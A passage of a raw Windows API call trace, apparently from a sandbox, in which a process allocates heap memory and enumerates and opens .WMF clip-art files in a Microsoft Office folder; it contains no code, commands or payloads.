lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.088] AreFileApisANSI () returned 1 [0101.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0101.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 69 [0101.088] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f20)) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0101.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.088] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x728, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN01084_.WMF", cAlternateFileName="")) returned 1 [0101.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0101.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0101.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0101.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0101.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0101.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0101.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0101.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0101.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0101.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0101.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0101.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0101.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.089] AreFileApisANSI () returned 1 [0101.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0101.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.089] AreFileApisANSI () returned 1 [0101.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0101.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 69 [0101.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.090] GetFileType (hFile=0x368) returned 0x1 [0101.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0101.090] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.090] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.090] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.090] CloseHandle (hObject=0x368) returned 1 [0101.091] AreFileApisANSI () returned 1 [0101.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0101.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 69 [0101.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.091] GetFileType (hFile=0x368) returned 0x1 [0101.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0101.091] CloseHandle (hObject=0x368) returned 1 [0101.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0101.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0101.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0101.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0101.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0101.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0101.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.092] AreFileApisANSI () returned 1 [0101.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0101.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 69 [0101.092] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x728)) returned 1 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0101.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.093] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x66dc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN01173_.WMF", cAlternateFileName="")) returned 1 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0101.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0101.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.156] AreFileApisANSI () returned 1 [0101.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0101.156] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.156] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0101.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.166] AreFileApisANSI () returned 1 [0101.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0101.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 69 [0101.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.185] GetFileType (hFile=0x33c) returned 0x1 [0101.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0101.186] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.186] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.187] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.188] CloseHandle (hObject=0x33c) returned 1 [0101.189] AreFileApisANSI () returned 1 